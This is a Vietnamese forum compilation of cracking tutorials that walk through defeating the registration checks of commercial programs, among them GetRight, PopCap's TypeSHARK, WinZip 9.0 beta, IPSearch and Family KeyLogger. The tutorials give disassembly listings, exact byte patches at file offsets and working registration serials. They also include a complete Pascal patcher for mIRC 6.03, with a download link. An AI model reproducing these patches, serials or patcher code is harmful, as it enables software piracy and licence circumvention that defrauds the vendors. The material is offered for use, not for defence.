:0049F6D8 C645FC01 mov [ebp-04], 01
:0049F6DC E8732F0600 call 00502654
:0049F6E1 8065FC00 and byte ptr [ebp-04], 00
:0049F6E5 8D8DA0FEFFFF lea ecx, dword ptr [ebp+FFFFFEA0]
* Possible Reference to Menu: MenuID_0001
|
• Possible Ref to Menu: MenuID_00B4, Item: "OK"
-------------------------
Nếu bạn nó tới đây đã crack được rồi. Đúng là như vậy, nhưng đây chỉ mới là điều kiện cần nhưng chưa đủ. Mục đích của chúng ta là disable cái nút “ Enter Code”, xoá nút “Buy now!” và nút “Buy”, he he chi vậy, để cho người ta không biết dòm vô tưởng ta bỏ tiền ra mua thật...Khi bạn crack ở trên thì vẫn chạy vi vu nhưng mấy cái nút đăng ký còn lại rất ngứa mắt, mục đích chúng ta là xoá nó đi ( đừng dùng reshack, chán lắm). Okie ở đây ta suy luận một chút, khi nhập đúng Reg Code thì chương trình có một đoạn mã để kiểm tra, nếu không đúng thì không xoá nút, còn ngược lại thì ..., Được rồi bạn hãy vào ref, tìm dòng “Config”, hoặc bạn có thể chạy hàm call 00499717 tại (1) cũng cho kết quả tương tự . Thoát ref ta đang đứng ở đây:

* Possible StringData Ref from Data Obj ->"Window00"
|
:004997DA 68384B5700 push 00574B38

* Possible StringData Ref from Data Obj ->"Config"
|
:004997DF 68184B5700 push 00574B18
:004997E4 8BC8 mov ecx, eax
:004997E6 E8457C0700 call 00511430
:004997EB 85C0 test eax, eax
:004997ED 7509 jne 004997F8 <---Cần crack, chú ý (3) :004997EF E8D31A0300 call 004CB2C7 :004997F4 85C0 test eax, eax :004997F6 740A je 00499802 * Referenced by a (U)nconditional or ©onditional Jump at Address: |:004997ED© | :004997F8 E886190300 call 004CB183 :004997FD E9401D0000 jmp 0049B542 * Referenced by a (U)nconditional or ©onditional Jump at Addresses: |:004997CF©, :004997F6© | Từ (1), (2), (3), ta sẽ có ba chỗ cần crack là : 1. Đổi một byte tại RVA 0049F70A (offset 0009EB0A) từ jz thành jnz (74 thành 75). 2. Đổi một byte tại RVA 0049F6A8 (offset 0009EAA8) từ jz thành jnz (74 thành 75). 3. Đổi một byte tại RVA 004997ED (offset 00098BED) từ jz thành jnz (74 thành 75). Chú ý : (3) chỉ được patch khi bạn đã thực hiện xong (1) và (2). Sau đó trở lại GetRight đăng ký. Đăng ký xong mới thực hiện (3) để xoá các nút. Get it and try it, bạn sẽ thích ngay mà he he. Thật ra còn nhiều chuyện để xử lý nó lắm nhưng tôi chỉ bàn đến vấn đề chính thôi, còn như bạn muốn crack tiếp thì nên disable các nút còn lại (các nút liên quan tới đăng ký)...Hoặc gỡ bỏ dòng Trial Version v v... III. Crack game PopCap---bài viết của Computer_Angel How to crack POPCAP Games : 1. TypeSHARK ver 1.00 Phần mềm: TypeSHARK ver 1.00 --- http://www.popcap.com
Bảo vệ: Trial version
Công cụ : -Softice 4.xx (công cụ để debug chương trình)
-IDA hay W32DASM
-Các công cụ Hex Editor (HexWorkshop)
File cần crack: WinTS.exe
Cracker: Computer_Angel

+ Tiến hành:
1. Kiểm tra đối tượng:
a) Chạy thử WinTS.exe, bạn sẽ thấy những vấn đề sau:
+ Màn hình intro có dòng chữ “REGISTER TYPESHARK”, “FREETRIAL VERSION”
+ Khi nhấn vào “REGISTER TYPESHARK”, một hộp thoại nhập Username+Serial hiện lên. Nhập thử bất kì username+pass thì nhận được thông báo “The registration code you have entered is incorrect...”
+ Sau khi chơi, không ghi tên vào bảng HALL FAME được.
+ Khi thoát ra, có hiện hộp thoại quảng cáo.
b) Dùng bất cứ một hex editor nào đó, load tập tin WinTS.exe vào, tìm thử một vài chuỗi mà bạn đã ghi nhận được ở các bước trên(Ở đây tôi dùng công cụ thông dụng là HexWorkshop 4.00). Ta tìm thử chuỗi “registration code you”, ta tìm được ở vị trí 00111B24 của tập tin.

2. Nhận xét:
+ WinTS.exe có khả năng Register (vì có hộp thoại đăng ký)
+ Không bị unpack Lý do là vì bạn có thể tìm được các chuỗi mà bạn thấy trong game.

3. Bắt đầu công việc:

a) Dùng IDA để dịch ngược WinTS.exe sang mã máy. Sau khi dịch xong, ta tìm tới Tab “Strings”, nhấn Alt-T để gõ vào chuỗi cần tìm kiếm. Gõ vào chuỗi “The registration code you have”. IDA sẽ nhảy tới vị trí chuỗi cần tìm trong Tab “Strings”.
b) Double click vào chuỗi vừa tìm ra đó, bạn sẽ được chuyển tới cửa sổ chứa thông tin sau:
aTheRegistratio db 'The registration code you have entered',0Ah
.rdata:00511B20 ; DATA XREF: .text:0043EE54
.rdata:00511B20 db 'is incorrect. Please try again.',0
.rdata:00511B67 db 0 ;

Như vậy, ta biết được WinTS.exe đọc chuỗi “The registration...” chỉ một lần ở vị trí mã lệnh là 0043EE54.
c) Chuyển sang Tab IDA-View (Chứa mã asm của WinTS vừa dịch ngược), nhảy tới vị trí mã lệnh 0043EE54 bằng cách gõ phím “G”, rồi nhập vào 0043EE54 và nhấn Enter, ta được đoạn mã sau:
text:0043EE54 push offset aTheRegistratio ; "The registration code you have entered\n"...
.text:0043EE59 mov byte ptr [ebp-4], 3
.text:0043EE5D call sub_407250

Nhìn lên phía trên 1 xíu, ta thấy có đoạn so sánh

.text:0043EE30 push eax
.text:0043EE31 call dword ptr [edx+54h] <--- Lưu ý .text:0043EE34 test al, al .text:0043EE36 jnz short loc_43EE8C <--- Lưu ý .text:0043EE38 push 1 .text:0043EE3A sub esp, 1Ch .text:0043EE3D mov ecx, esp .text:0043EE3F mov [ebp+8], esp .text:0043EE42 push offset aOk ; "OK" .text:0043EE47 call sub_407250 .text:0043EE4C sub esp, 1Ch .text:0043EE4F mov ecx, esp .text:0043EE51 mov [ebp-14h], esp .text:0043EE54 push offset aTheRegistratio ; "The registration code you have entered\n".. d) Vậy chúng ta có 2 vị trí cần lưu ý. Ta phải kiểm tra xem chức năng của 2 vị trí đó là gì bằng cách dùng Softice. Ta kích hoạt Softice, dùng SymBol Loader để load tập tin WinTS.exe vào, và nhấn vào “Load Symbols” trên toolbar để chạy tập tin --> Cửa sổ softice debug sẽ hiện lên.
Ta đặt break point tại vị trí lệnh cần lưu ý ở trên bằng cách gõ vào BPX 0043EE31 và nhấn F5.
Chương trình WinTS sẽ chạy bình thường, chọn “REGISTER TYPESHARK”, nhập username+mã bất kì vào và nhấn OK.
Khi đó cửa sổ Softice debug sẽ bật lên ngay tại vị trí 0043EE31, nhấn F10 để chạy lệnh tại ví trí đó, tiếp tục nhấn F10 tới khi vệt sáng dừng lại tại vị trí 0043EE36.
Đây là lệnh nhảy khi AL không bằng 0, mà ta thấy AL=0, vậy ta đổi cờ Z bằng cách gõ vào R, và dùng Tab di chuyển con nháy tới hàng ở phía trên cao dưới hàng ESI=xxxxxxxxx . Dùng mũi tên di chuyển con nháy tới chữ Z và nhấn Insert.
Để ý, sau khi nhấn xong, ở vị trí lệnh 43EE36 có mũi tên chỉ xuống, đó là biểu thị câu lệnh này sẽ nhảy đến vị trí chỉ định.
Ta nhấn F5 và xem kết quả, ta thấy chương trình WinTS có hiển thị như sau:
+ Dòng chữ “FREE TRIAL version” --> “REGISTER VERSION”
+ Dòng “REGISTER TYPESHARK” o còn nữa.

Như vậy, ta có nhận xét:
+ Hàm call ở vị trí 43EE31 có nhiệm vụ kiểm tra username+password nhập vào và trả về kết quả AL=1 nếu hợp lệ.
e) Thoát khỏi WinTS, nhấn vào nút “Load Symbols” để chạy lại 1 lần nữa, cũng nhập lại số serial+user tùy ý.Cửa sổ Softice debug lại hiện ra, lần này bạn nhấn F8 để debug vào trong hàm kiểm tra. Vệt sáng sẽ chuyển sang địa chỉ là 4A3D20, nhấn F9 để đặt break point tại địa chỉ này, sau đó nhấn F5 để chạy chương trình bình thường.
f) Thoát khỏi WinTS, nhấn vào nút “Load Symbols” để chạy lại 1 lần nữa, lần này ta thấy màn Softice Debug hiện ra, vệt sáng nằm tại vị trí 4A3D20.
---> Nhận xét WinTS gọi hàm này khi:
+ Bắt đầu chạy để kiểm tra, kết quả trả về AL=1 thì có nghĩa đã đăng ký rồi.
+ Khi chọn mục đăng ký và nhập số serial+username.
g) Nhấn F10 để thi hành từng câu lệnh, cho tới khi vệt sáng nằm ngay lệnh RET:

.text:004A406F pop esi
.text:004A4070 mov al, bl <--------- Lưu ý .text:004A4072 pop ebx .text:004A4073 call loc_4EE297 .text:004A4078 mov esp, ebp .text:004A407A pop ebp .text:004A407B retn 8 <-------- vệt sáng nằm ngay đây. Khi đó, AL=0 (vì chưa đăng ký hay đăng ký sai). Nhìn lên trên 1 xíu, ta thấy tại vị trí 4A4070 chứa mã lệnh mov al,bl. Như vậy, ta có thể thay đổi lệnh này sau cho giá trị của AL luôn là 1 --> đổi từ mov al,bl sang mov al,01.
-->byte: 8A C3 sang B0 01

4. Crack tập tin WinTS:
Trong IDA, nhảy tới vị trí lệnh 4A4070, nhìn vào thanh status bar nằm ở dưới, ta thấy có 2 số :
+ 4A4070 : là vị trí lệnh trong chương trình
+ A4070 : là vị trí của lệnh trong tập tin.
Mở HexWorkshop lên, nạp tập tin WinTS.exe vào, gõ Ctrl-G, chọn Hex, gõ vào A4070.
HexWorkshop sẽ chuyển tới vị trí này. Nhấn TAB để con nháy nằm bên phần có số Hex và gõ vào B001.
Nhấn Ctrl-S để save lại.

Như vậy bạn đã crack xong game TypeSHARK ver 1.00 của Popcap.

IV. Viết Patch Gen.
Khi bạn crack bằng phương pháp patch, xong không lẽ mỗi lần xài lại phải crack nó...Sao ta không lưu lại bằng một chương trình gì đó mà mỗi khi cài lại ta không cần phải ngồi crack nữa ???. Do đó patch gen ra đời, thật ra có nhiều patch gen được làm sẵn như File patcher 4.0, Fast Patch nhưng tại sao mình không tự viết patch gen nhỉ. Tôi thì thươngf viết Patch Gen bằng VC nhưng chỉ giới thiệu với mội người một patch gen cực kỳ đơn giản bằng Pascal, đây là một ngôn ngữ khá thân thiện với giới tin học VN, nên tôi chọn để giới thiệu cùng các bạn. Patch Gen này do anh NVC © viết...Bạn có thể “ chế lại theo sở thích của mình. Để hiểu được nó bạn phải biết về Kiểu File trong Pascal vì nó thao tác trên file mà...Nó dùng các hàm đơn giản như IOResult, Seek,Assign, Reset vv...Sau đây là một patch gen mình hoạ cho chương trình crack mIRC 603. Các bạn đem về xem thử nhe. Sau đó dịch ra và chạy.
uses crt;
const
offset1=$000C5A48; {Địa chỉ offset cần crack}
var
ch:char;
procedure patch(location:longint);
var
F:file of byte;
x:array[0..1]of byte; {Số byte cần crack}
begin
{$I-}
Assign(F,'mirc.exe'); {gán tên file cần crack}
Reset(F); {Mở file vừa gán để đọc }
{$I+}
If Ioresult<>0 then { Nếu tìm không thấy file}
Begin
clrscr;
textcolor(lightgreen);
Writeln;Writeln;
Writeln('Ban Phai Chay File Crack Trong Thu Muc Co Chua File Can CraCk...!');
Readln;
End Else {nguoc lai}
Seek(F,location);
x[0]:=$75; {Giá trị cần đổi của file crack}
Write(F,x[0]);{Ghi lên file}
Close(F); { Đóng file}
End;
Begin
Clrscr;
textcolor(lightgreen);
Writeln(' by hacnho from VCT ');
Textcolor(white);
Gotoxy(10,9);
Writeln('Ban hay nhan phim P de Patch, Phim bat ky de thoat:');
Ch:=Readkey;
If(ch='p')or(ch='P')then
begin
patch(offset1);
Writeln;Writeln;Writeln;
Gotoxy(17,15);Writeln('mIRC603 PaTcH successful !');
Gotoxy(17,17);Writeln('***** More CRaCk, please contact me at *****');
Gotoxy(20,18); Writeln;
Gotoxy(20,19); Writeln('*************************************');
Gotoxy(20,20); Writeln('* E-Mail : tommy9982@yahoo.com *');
Gotoxy(20,21); Writeln('* YIM : tommy9982 *');
Gotoxy(20,22); Writeln('* http:\\www.vietcracks.com *');
Gotoxy(20,23); Writeln('*************************************');
Readln;
end else Exit
end.
Chương trình đã dịch rồi
http://www.vietcracks.com/download/test.rar

V. Thuật toán, thuật ngữ thường dùng…Bổ sung tiếp

1. Các hệ đếm:
Thông thường ta có các hệ đếm cơ bản như sau:

a. Hệ Decimal (10): dùng các ký tự số 0,1..9
Ví dụ : 2754 = 4+5.10+7.10.10+2.10.10.10
b. Hệ Hexa (16): dùng các ký tự số và chữ 0,1,…9, A,B..F
Ví dụ : 3C5F = 15+5.16+16.16.16+3.16.16.16
c. Hệ Binary(2): dùng các ký số 0,1
Ví dụ : 1001 = 1+0.2+0.2.2+1.2.2.2
(còn tiếp…)

Okie thế là chúng ta đã đi hết Giai Đoạn 1: Nhập môn cracker. Các bạn cảm thấy thế nào? Crack cũng khá dễ dàng ấy nhỉ ??? Thôi tạm biệt chúc các bạn may mắn. Trong một ngày gần đây tôi sẽ up lên Phần 9—GIAI ĐOẠN, các bạn đón theo dõi bài viết của hacnho

How to crack WinZip® Version 9.0 PRE-RELEASE BETA TEST VERSION (5661)

Phần mềm: WinZip 9.0 beta2
Bảo vệ: Unregistered Version/ Name Serial.
Công cụ :
-W32DASM ver 893
-OllyDBG 1.09b
Phương pháp crack: Find real serial
Mức độ ()Dễ (x)Vừa ()Hơi khó ()Rất khó
File cần crack WINZIP32.EXE
Cracker: hacnho (hacnho@hopthu.com)
Website: http://kickme.to/VCT/

I. Giới thiệu

Chào các bạn, lâu lắm rồi hacnho mới viết tut mới, dạo này đang chạy XP nên lười cài SI. Cho nên thích crack các soft nhỏ bằng Olly 1.09b hơn. Hôm nay WinZip đã ra bản 9.0 beta 2 build 5611. Tuy là nó không có gì thay đổi so với bản beta 1 nhưng tâm lý mọi người thích cái mới hơn. Do đó yêu cầu đặt ra là phải crack cho nó nóng sốt . Okie, chúng ta bắt đầu crack thôi. Yêu cầu lần crack này là tìm được real serial ứng với name nhập vào. Từ đó tìm hiểu thêm về đoạn mã để tiện việc code keygen.

II. Bắt tay vào crack Winzip 9.0 beta 2

Đầu tiên, sau khi cài đặt xong, ta chạy Winzip 9.0 beta 2 thì một nag hiện lên bắt nhập số serial. Ở đây hacnho nhập vào : Name = hacnho, Regcode bằng 15101983. Một nag văng ra “Incomplete or incorrect information”. Do chúng ta cầm tìm real serial tương ứng với Name = hacnho nên dùng OllyDBG 1.09b có plugin Command Bar load file WINZIP32.EXE lên. Righ click tại phần main của Olly, chọn Search for --->All referenced text string. Chọn search for text. Gõ vào một chuỗi của câu thông báo mà Winzip cho ta là “Incomplete”. Wow, không có gì xảy ra cả. Hic hic, mất cả 5 phút để kiếm cái string “Incomplete or incorrect information” trong Olly mà chả thấy. Ta đành nhờ chàng WinDASM 8.93 xem sao. Okie, mở WinZip bằng Wdasm, vào Ref menu kiếm dòng “Incomplete or incorrect information”, xong rồi double click vào dòng string để nhảy ra main của WinDasm. Xem địa chỉ của nó là bao nhiêu. Hà hà thì ra hắn nằm ngay tại Code Data : 0040D202. Bây giờ ta đóng Wdasm lại. Vào main của OllyDBG, gõ Ctrl+G, nhập vào 0040D202. Bạn sẽ thấy những dòng tương tự như vầy :

0040D202 |> E8 C6F7FFFF CALL WINZIP32.0040C9CD

0040D207 |. 68 8E020000 PUSH 28E

0040D20C |. E8 97C10500 CALL WINZIP32.004693A8

Bây giờ bạn di chuyển thanh cuộn lên vài hàng cho đến khi gặp những dòng sau:

0040D18C |. FF15 9C954B00 CALL DWORD PTR DS:[<&USER32.GetDlgItemTextA>] ; \GetDlgItemTextA

0040D192 |. 56 PUSH ESI

0040D193 |. E8 9EC00500 CALL WINZIP32.00469236

0040D198 |. 56 PUSH ESI

0040D199 |. E8 C1C00500 CALL WINZIP32.0046925F

0040D19E |. 803D 8CA14D00 >CMP BYTE PTR DS:[4DA18C],0

0040D1A5 |. 59 POP ECX

0040D1A6 |. 59 POP ECX

0040D1A7 |. 74 59 JE SHORT WINZIP32.0040D202 -->Nhận name nhập vào

0040D1A9 |. 803D B8A14D00 >CMP BYTE PTR DS:[4DA1B8],0

0040D1B0 |. 74 50 JE SHORT WINZIP32.0040D202 -->Nhận serial name nhập vào

0040D1B2 |. E8 6DFCFFFF CALL WINZIP32.0040CE24 --> Gọi đoạn mã tạo key

0040D1B7 |. 84C0 TEST AL,AL --> so sánh serial nhập và sinh ra

0040D1B9 |. 74 47 JE SHORT WINZIP32.0040D202 --> bắn nag

0040D1BB |. 57 PUSH EDI

Vậy chúng ta đã xác định được WinZip sử dụng hàm API GetDlgItemTextA để xét serial và name nhập vào. Yeah, chúng ta đã biết được breakpoint cần thiết để trace. Bây giờ bạn hãy nhấn F2 (tương tự F7 trong SoftIce) để toogle breakpoint tại dòng 0040D18C . Bạn nhấn F9 (tương tự F5 trong SoftIce) để chạy. Cái nag bắt đăng ký bật lên. Nhập vào name là hacnho, serial là 15101983. Nhấn OK. Waa, Olly Ice tại đây 0040D18C. Bạn bắt đầu nhấn F8 (tương tự F10 trong SoftIce) để trace downward. Khi trace tới dòng:

0040D1B2 |. E8 6DFCFFFF CALL WINZIP32.0040CE24 --> Gọi đoạn mã tạo key

0040D1B7 |. 84C0 TEST AL,AL --> so sánh serial nhập và sinh ra

Ta nhận thấy rằng Winzip gọi hàm kiểm tra key ngay trước dòng test al, al. He he ta cần xem cái đoạn đó nó tạo key ra sao. Okie bạn nhấn F7 (tương tự F8 trong SoftIce) để nhảy vào trong đoạn call này. Bạn sẽ thấy những dòng này sau đó:

0040CE24 /$ 55 PUSH EBP

0040CE25 |. 8BEC MOV EBP,ESP

0040CE27 |. 81EC 40030000 SUB ESP,340

0040CE2D |. A1 B06A4D00 MOV EAX,DWORD PTR DS:[4D6AB0]

Tiếp tục trace downward, đến đoạn:

0040CE8E |> 0FB603 /MOVZX EAX,BYTE PTR DS:[EBX]

0040CE91 |. 50 |PUSH EAX

0040CE92 |. E8 41270900 |CALL WINZIP32.0049F5D8

0040CE97 |. 85C0 |TEST EAX,EAX

0040CE99 |. 59 |POP ECX

0040CE9A |. 74 05 |JE SHORT WINZIP32.0040CEA1

0040CE9C |. 8A03 |MOV AL,BYTE PTR DS:[EBX]

0040CE9E |. 8807 |MOV BYTE PTR DS:[EDI],AL

0040CEA0 |. 47 |INC EDI

0040CEA1 |> 43 |INC EBX

0040CEA2 |. 803B 00 |CMP BYTE PTR DS:[EBX],0

0040CEA5 |.^75 E7 \JNZ SHORT WINZIP32.0040CE8E

bạn sẽ phải trace nhiều lần. Tại sao, hì...Lý do là đoạn này sẽ xét từng ký tự, để tạo ra số serial tương ứng với mỗi ký tự. Do chỉ cần tìm real serial tôi không đi sâu vào phần phân tích cách tạo key. Tiếp tục chờ Olly trace vòng vòng cái đoạn mã này 6 lần (ứng với sáu ký tự h a c n h o). Bạn tiếp tục trace từ từ cho tới đoạn mã này:

0040CF66 |. 50 PUSH EAX

0040CF67 |. 56 PUSH ESI

0040CF68 |. E8 51F4FFFF CALL WINZIP32.0040C3BE

0040CF6D |. 8D85 C0FCFFFF LEA EAX,DWORD PTR SS:[EBP-340] --> hiện real serial : BCDC063C

0040CF73 |. 50 PUSH EAX

bạn khỏi cần d EBP-340 để thấy real serial làm chi cho cực. Các cửa số của OllyDBG tự động hiện ra chuỗi ASCII có số serial hà :

0012EE5C 004DA18C ASCII "hacnho"

0012EE60 0012EE70 ASCII "BCDC063C"

0012EE64 004DA18C ASCII "hacnho"

0012EE68 004DA1B8 ASCII "15101983"

Okie, Số serial thực ứng với Name= hacnho là BCDC063C. Thế là WinZip9.0 beta2 đã bị crack rồi đó.

Lưu ý: các bạn nếu dùng SoftICe để crack mà không thích Olly thì hacnho có mấy lời khuyên sau đây:

+ WinZip 9.0 beta 2 có 13 đoạn Call sử dụng hàm API Getdlgitemtexta. Do đó nếu bạn chỉ đặt khơi khơi breakpoint Getdlgitemtexta thì nên nhớ chỉ nhấn F5 một lần để nó Ice tại đoạn mã nhập Name và Serial. Nếu tuỳ tiện nhấn F5 vài lần thì SoftIce sẽ dẫn bạn tới Xômali luôn đó.

+Olly có giao diện trực quan, dễ analyze, do đó ta dễ dàng tìm ra breakpoint cần thiết. Còn thằng SI thì không nên rất khó đặt breakpoint. Muốn đặt chính xác bạn phải hiểu rõ cấu trúc của các hàm API.

III. Kết luận

Qua tut này ta học được một điều, cần phải linh động dùng các soft bổ sung cho nhau, sẽ mang lại kết quả hơn cả mong đợi.

PHỤ LỤC: hàm API Getdlgitemtext

GetDlgItemText

The GetDlgItemText function retrieves the title or text associated with a control in a dialog box.

UINT GetDlgItemText(

HWND hDlg, // handle of dialog box

int nIDDlgItem, // identifier of control

LPTSTR lpString, // address of buffer for text

int nMaxCount // maximum size of string

);

Parameters

hDlg

Identifies the dialog box that contains the control.

nIDDlgItem

Specifies the identifier of the control whose title or text is to be retrieved.

lpString

Points to the buffer to receive the title or text.

nMaxCount

Specifies the maximum length, in characters, of the string to be copied to the buffer pointed to by lpString. If the length of the string exceeds the limit, the string is truncated.

Return Values

If the function succeeds, the return value specifies the number of characters copied to the buffer, not including the terminating null character.

If the function fails, the return value is zero.

Remarks

The GetDlgItemText function sends a WM_GETTEXT message to the control.

----------------------------------------------------------------------------------------------

_Bài viết của hacnho xin vui lòng để lại dòng này khi trích dẫn hoặc đăng tải.

_download bản tut bằng HTML :
Yeah! Để hưởng ứng với HacNho part II “Cracker! Who are you” phần lấy correct Serials, Zombie post tiếp tuts cho chương trình này…

Production: IPSearch 1.9
Copyright by: Paul Gerhart
Homepage: http://www.worldlynx.net/pgerhart/
Protector: Name/Serials
Packed: None
Tools: OllyDbg 1.09d
Done: Get Correct Serials
Cracked by: Zombie DeathMan
Comment: IPsearch lets you search the Internet's IP address space - give it a starting IP address and it sequentially searches for HTTP ports and reports summary HTML content. IPsearch can also do a complete Whois function and can convert domain names to IP addresses. Results can be saved and printed.

Sử dụng thử thử chương trình bạn sẽ thấy gặp một số khó chịu khi chưa Reg: Menu Item yêu cầu Reg, hiện Nag khi Exit, limited functions…

Hm…Với ngần ấy rắc rối này mà patch thì hơi mệt đa (vì phải tìm đến từng vị trí cần correct serials mà Patch). Thui…Đành chơi ra correct Serials vậy (còn Keygen thì….hm..Chương trình này thuật tạo Keygen cũng no so hard..You can try it.. )

Bắt đầu crack để tìm correct serials là việc tìm đến BadBoy. Ở đây là string “Name/Code mis-match. Try again.” Oki! Sử dụng OllyDbg để tìm đến String này.
Bạn sẽ đến được BadBoy này tại Addr: 004057F7

004057F3 |> \6A 00 PUSH 0 -->Dịch dấu nháy đến here bạn sẽ thấy OllyDbg chỉ đến lệnh nhảy trước đó (Jump from) ở Addr 00405760, 0040579B
004057F5 |. 6A 00 PUSH 0
004057F7 |. 68 8C834100 PUSH IPsearch.0041838C ; ASCII "Name / Code mis-match. Try again."

Như vậy ở 2 Addr 00405760, 0040579B nếu nhảy sẽ --> BadBoy. Vì thế chắc chắn trước đó phải có hàm tạo Keygen…Yeh! Hàm tạo Keygen ở 00405743. Vào trong hàm này bạn sẽ thấy nó được Call từ khá nhiều chỗ --> Patch là mệt nghĩ.

Tìm đến 00405786.

0040577E |. 52 PUSH EDX ; /s2
0040577F |. 8B85 7CFFFFFF MOV EAX,DWORD PTR SS:[EBP-84] ; |
00405785 |. 50 PUSH EAX ; |s1
00405786 |. FF15 B0454100 CALL DWORD PTR DS:[<&MSVCRT._mbscmp>] ; \_mbscmp

Ở đây là hàm cmp với 2 đối số là 2 String cần so sánh. Rõ rồi. Chỉ cần set bp here là bạn sẽ có được CorrectSerials (Nhìn giá trị ở các đối số: 1 cái là your entered, còn cái kia là correct).
Xong! Vậy bạn chỉ việc chạy lại chương trình và nhập lại đúng thôi.

*********************************************************
Name: Zombie
Serials: B4E6FEEF3C44F074782E8C5E36FEC2E9
Name: Zombie DeathMan
Serials: 07E7EF148B80CA07ADB21D7AC9FE94E1
**********************************************************

PS: Trong quá trình trace code bạn sẽ thấy một chuỗi string..ke..ke..Lưu ý nó nha..Khá quan trong cho việc code keygen đó…
Name/Code sau khi Oki sẽ được lưu trong Reg ở HKEY_LOCAL_MACHINE\SOFTWARE\Paul Gerhart Software\IPsearch\User
Hic..Zombie tìm ra được thuật code keygen của nó (dựa trên language ASM) nhưng code ngược lại bằng Visual Basic .NET không được..Tức cành hông ..!

[/B]

--------------------
Welcome to THE H-E-L-L
A world no sense of mercy !!!

*********************************************

Buồn...Thương người đơn phương ...!
Chỉ mong rollback thời gian...
Chỉ mong có được người ấy như xưa...
Chỉ mong....
*********************************************
Tìm real key hả cho tui tham gia với:

[Marquee]CRACK FAMALY KEYLOGGER v2.53[/Marquee]

Download at: www.SpyArsenal.com

Cracker : deux

Tool: softice for win, w32dasm

Đây là một soft kiểm tra key không phức tạp nhưng lại rất dài dòng vậy nên nếu không tìm ra chô cần carck thì rất dễ nản , bây giờ hãy bắt đầu.

Mở W32Dasm disasembler nó ra tìm cái nag invalid key trong Refs>String Data.

Dbclick vào nó sẽ đưa bạn đến chỗ cái nag

* Referenced by a (U)nconditional or ©onditional Jump at Address:

|:004034D6©

|

:004034FF 6A00 push 00000000

* Possible StringData Ref from Data Obj ->"FamilyKeyLogger"

|

:00403501 8B0D08514000 mov ecx, dword ptr [00405108]

:00403507 51 push ecx

chú ý tại 004034D6© nó cho biết có một lệnh nhảy có điều kiện đến cái nag, nhấn shift+F12 điền vào địa chỉ này OK bạn sẻ đến đây:

:004034C9 FF1578104000 Call dword ptr [00401078]

:004034CF E895E8FFFF call 00401D69

:004034D4 85C0 test eax, eax

:004034D6 7427 je 004034FF nhảy đến nag nếu =0

:004034D8 6A00 push 00000000

* Possible StringData Ref from Data Obj ->"FamilyKeyLogger"

|

:004034DA A108514000 mov eax, dword ptr [00405108]

:004034DF 50 push eax

* Possible StringData Ref from Data Obj ->"Thank you for registration!"

|

:004034E0 8B0D4C514000 mov ecx, dword ptr [0040514C]

như vậy đều cần thiết là cái lệnh nhảy đó phải đứng im, tuy nhiên điều cần làm là tìm key chớ không phải patch, và nếu bạn patch thì cho dù co lên cái câu "Thank you for registration" bạn cũng vẫn bị đòi đăng ký ở lần sau, các soft bây giờ nó đểu lắm, patch nag là xưa rồi,Okie bạn hãy nhìn lên trước cái lệnh nhảy sẽ có lệnh call 00401D69, chính lệnh call này sẽ gọi một hàm , và hàm này quyết định xem số key của bạn đúng hay sai. Vậy hãy di chuyển đến đó và click vào nút Call , bạn sẽ đến một nơi nào đó trong chương trình , hãy kéo xuống một đoạn nữa đến chỗ sau:

:00401E4B 8D95F8FDFFFF lea edx, dword ptr [ebp+FFFFFDF8] chuyển key bạn nhập vào edx

:00401E51 52 push edx

* Reference To: KERNEL32.lstrlenA, Ord:0308h hàm này cho chiều dài của chuỗi ban nhập

|

:00401E52 FF159C104000 Call dword ptr [0040109C]

:00401E58 83F81D cmp eax, 0000001D so sánh số ký tự với 1D(hex)=29(Dec)

:00401E5B 7407 je 00401E64 nhảy nếu bằng

:00401E5D 33C0 xor eax, eax set cho eax=0 ( nguyên nhân dẫn đến cái nag)

:00401E5F E942040000 jmp 004022A6

như vậy số ký tự bạn nhập vào phải bằng 29, tất nhiên nếu nhìn vào W32dasm thì không thể thấy chính xác các phép toán thực hiện như thế nào vì nó không thể hiện được giá trị của register hay address tại thời điểm chạy đến đoan mã này, nhưng bạn cần suy đoán để tìm ra thôi, ví dụ như tại sao nhìn vào lea edx, dword ptr [ebp+FFFFFDF8] lại biết là nó chuyển reg của mình nhập vào edx, cái này thì không ai có thể bày cho bạn được mà bạn phải crack nhiều , chịu khó quan sát và kinh nghiệm sẽ cho bạn biết chỗ cần tìm. Đối với người mới bắt đầu có thể xài soft-ice để kiểm chứng lại cái đoạn tôi nói ở trên,

do crack này hơi dài tôi chỉ nói sơ trong SI như sau:

set BP trong SI là getdlgitemtextA xong press F5 trở về lại màn hình đăng ký, nhấn OK bạn sẽ trở lại màn hình của SI, nhấn F12 để trở về vị trí vừa gọi hàm Getdlgitemtexta, trace down bằng F10 , thêm một luu ý nữa nếu gặp các hàm API thì cứ việc nhấn F10, bạn có thể biết nó là hàm API khi trước đó có phần Kernell32.dll.. hay User32., bởi vì bạn không cần biết nội dung của hàm đó, nếu muốn biết thì tốtnhất là tìm các tut về hàm API, còn nếu gặp các lệnh call đến các địa chỉ như

Call 004xxxxxx thì các bạn làm ơn trace bằng F8 để vào xem cái hàm đó nó làm gì nếu không sẽ trace qua cái đoạn code cần tìm. Bạn trce bằng F10 đến khi gặp hàm [Kernel32!sleep], ngay bên dưới nó sẽ có một lệnh Call, trace bằng F8 vào lệnh call này bạn sẽ đến đoạn mã cần tìm tương ứng bên W32dasm.

lưu ý đối với những người mới cài và sử dụng SI:để set breakpoint cho các hàm API trong Kernek32.dll và User32.dll cần phải mở Winice.dat bằng Notepad và bỏ dấu ";" trước các lệnh sau

EXP=c:\windows\system\kernel32.dll

EXP=c:\windows\system\user32.dll

Rồi khởi động lại.

Trở lại với W32Dasm, nói chung nhiệm vụ của bạn là phải làm sao cho nó đừng nhảy tới chỗ

xor eax,eax mà lèo lái sao cho nó đến chỗ mov eax,00000001 thì soft sẽ đăng ký thành công, tất nhiên bạn có thể patch nhưng như vậy thì cũng phải sử cả chục cái lệnh nhảy chớ không ít đâu,bây giờ giả sử bạn đã nhập đủ 29 ký tự thì sẽ đến vị trí sau:

:00401E64 0FBE85FCFDFFFF movsx eax, byte ptr [ebp+FFFFFDFC]

:00401E6B 83C00A add eax, 0000000A cộng kt thứ 5 với A

:00401E6E 83F837 cmp eax, 00000037 so sánh với 37

:00401E71 7E07 jle 00401E7A nhảy nếu nhỏ hơn

:00401E73 33C0 xor eax, eax

:00401E75 E92C040000 jmp 004022A6

Bạn hãy nhớ byte ptr[ebp+FFFFFDF8] là ký tự đầu tiên, nên byte ptr [ebp+FFFFFDFC] là ký tự thứ 5

